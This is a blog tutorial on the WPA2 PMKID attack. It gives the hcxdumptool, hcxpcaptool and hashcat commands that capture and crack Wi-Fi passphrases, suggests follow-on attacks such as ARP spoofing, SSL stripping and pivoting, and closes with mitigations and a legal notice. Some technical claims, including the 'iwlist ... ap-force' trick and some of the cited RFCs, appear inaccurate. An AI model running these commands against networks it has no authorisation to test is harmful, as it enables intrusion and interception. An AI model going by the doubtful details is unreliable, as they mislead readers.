Understanding (and pwning) PMKID: What You Need to Know

proxydomproxydom
4 min read

1. PMKID: Protocol-Level Definition

The Pairwise Master Key Identifier (PMKID) is a 128-bit cryptographic construct defined in the IEEE 802.11i-2004 standard (WPA2). It is derived during the initial authentication handshake to enable PMKSA (Pairwise Master Key Security Association) caching, optimizing reauthentication for roaming clients.

Cryptographic Derivation

The PMKID is generated using the following inputs:

  • PMK (Pairwise Master Key): A 256-bit key derived from the PSK (Pre-Shared Key) using:

      PMK = PBKDF2-SHA1(Passphrase, SSID, 4096, 256)
    
  • Authenticator MAC (AA): MAC address of the AP.

  • Supplicant MAC (SPA): MAC address of the client.

  • PMK Name: Static string "PMK Name" (16 bytes).

The final PMKID:

PMKID = HMAC-SHA1-128(PMK, AA || SPA || "PMK Name")

ℹ️ The HMAC-SHA1 truncation to 128 bits follows RFC 2104 guidelines.

Why was the PMKID created?

To speed up roaming. PMKID enables PMKSA caching (RFC 5217), allowing clients to skip full EAPOL authentication when rejoining a network. The AP stores the PMKID in its PMKSA cache, indexed by the client’s MAC address.


2. PMKID Harvesting: Exploitation Mechanics

The PMKID is exposed in:

  • RSN Information Element (IE): in Beacon frames

  • Probe Response frames: when clients actively probe the AP

Capturing the PMKID (Passive Sniffing)

Using hcxdumptool to capture:

hcxdumptool -i wlan0mon -o pmkid.pcapng #with this command, you will capture EVERY pkmid near you

Then extract the hash with hcxpcaptool:

hcxpcaptool -z pmkid_hash.txt pmkid.pcapng

Cracking the PMKID Offline

Using hashcat (mode 22000):

hashcat -m 22000 pmkid_hash.txt rockyou.txt # -r if you use rules (recommended)

💡 With a strong GPU (e.g., RTX 4090), try the All-In-One password lists for higher success rates (and use some rules. I recommend this repository for “general purpose” cracking, while this one is “better” for Wi-Fi passwords).

Why does this attack work?

Because PMKID is directly derived from the PMK, which is derived from the PSK. Cracking the PMKID = obtaining the Wi-Fi password.


3. PMKID vs 4-Way Handshake Attacks

4-Way Handshake Recap

To derive PTK from a full handshake:

PTK = PRF(PMK, "Pairwise key expansion", AA || SPA || ANonce || SNonce)

Requires capturing all 4 EAPOL frames, including a valid MIC for offline cracking.

PMKID Advantages

  • No need to wait for a full handshake

  • No MIC to validate

  • Simpler cracking flow (PMKID → PSK directly)

MetricPMKID4-Way Handshake
PrecomputationNonePMK + PTK Derivation
Hashcat Mode220002500 / 2501
Capture RequiredBeacon/Probe RespAll 4 EAPOL Frames
MIC validition

4. Exploitation FAQs

Can I force the AP to send a PMKID?

Yes. You can send directed probe requests:

iwlist wlan0 scan ap-force

This might trigger the AP to respond with a PMKID.

Are there any hardware requirements?

  • Required: Wi-Fi NIC supporting monitor mode (e.g., Atheros AR9271, RTL8812AU)

  • Recommended: GPU acceleration (e.g., RTX 4090 ~1.4M H/s)

What can I do after cracking the PSK?

A few nasty ideas:

  • Layer 2 Attacks: ARP spoofing, sniffing packets

  • MITM Setup: SSL stripping, rogue DNS/DHCP

  • Network pivoting: Internal reconnaissance, lateral movement


5. Mitigation Strategies

For Network Operators

  1. Adopt WPA3: Use SAE (Simultaneous Authentication of Equals)

  2. Disable PMKID (if stuck with WPA2):

    • Cisco IOS:

        no dot11 pmkid
      
    • OpenWRT: In /etc/config/wireless:

        option pmkid 0
      
  3. Force MAC Randomization: Prevents PMKSA caching

For Vendors

  • Apply CVE-2018-14526 patches

  • Suppress PMKID in Beacon/Probe frames by default

  • Promote WPA3 adoption via firmware defaults


6. Affected Devices

⚠️ The following list is not exhaustive. Any WPA2-PSK router with PMKID enabled is potentially vulnerable.

Vulnerable by default

  • Cisco Aironet 1850: IOS < 8.10.130.0

  • Aruba AP-325: ArubaOS < 8.6.0.18

  • Ubiquiti UniFi AP-AC-Pro: Firmware < 4.3.28

Patched or Immune

  • MikroTik hAP ac³: RouterOS 7.7+ (WPA3 required)

  • Ruckus R750: Unleashed 200.14+ (PMKID disabled by default)


7. Conclusion

The PMKID flaw is a perfect example of backward-compatible security gone wrong.

WPA3’s SAE protocol solves this with a more robust, zero-knowledge authentication method. But millions of WPA2 routers are still online and vulnerable.

If you're a red teamer: this is a clean, silent, and deadly way in.

If you're a blue teamer: patch, monitor, migrate. Start with:

  • Protocol Upgrades (WPA3-SAE)

  • Firmware Updates

  • Strong Passphrases (avoid anything in RockYou.txt, and use a very strong password)

Happy (ethical) hacking!

LEGAL NOTICE
I do not support illegal access, intrusion, or surveillance.
All content in this article is for research, educational, and defense training.
Do not reproduce these actions in any real-world scenario unless you have explicit, written permission.


Further Reading

0
Subscribe to my newsletter

Read articles from proxydom directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

proxydom
proxydom

Italian college student who loves cats, beer and ethical hacking.